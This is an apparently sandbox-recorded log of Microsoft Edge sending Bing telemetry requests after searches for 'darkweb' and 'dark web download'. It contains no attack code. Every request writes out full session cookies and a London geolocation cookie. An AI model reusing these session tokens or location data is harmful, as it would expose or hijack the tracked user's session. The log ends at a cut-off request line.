cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f233c9
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 678
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23461
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:11,%22BC%22:368,%22SE%22:-1,%22TC%22:-1,%22H%22:381,%22BP%22:444,%22CT%22:445,%22IL%22:4},%22ad%22:[43,196,1263,601,1263,2832,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:11,%22BC%22:368,%22SE%22:-1,%22TC%22:-1,%22H%22:381,%22BP%22:444,%22CT%22:445,%22IL%22:4},%22ad%22:[43,196,1263,601,1263,2832,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23462
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 365
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1

Response

HTTP/2.0 200

content-length: 15999
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a4c21d14665968ddc39eb6ad429
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-uUmmo4PbW1iex6AmFeX/aTi0xPEvWOLdFWji24vLWCo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:09:16 GMT
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23480
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306947612%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%224.8%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306947612%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306947621%2C%22Name%22%3A512%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947621%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947622%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306947612%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%224.8%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306947612%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306947621%2C%22Name%22%3A512%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947621%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947622%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23486
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947624%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947624%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f2348b
GET

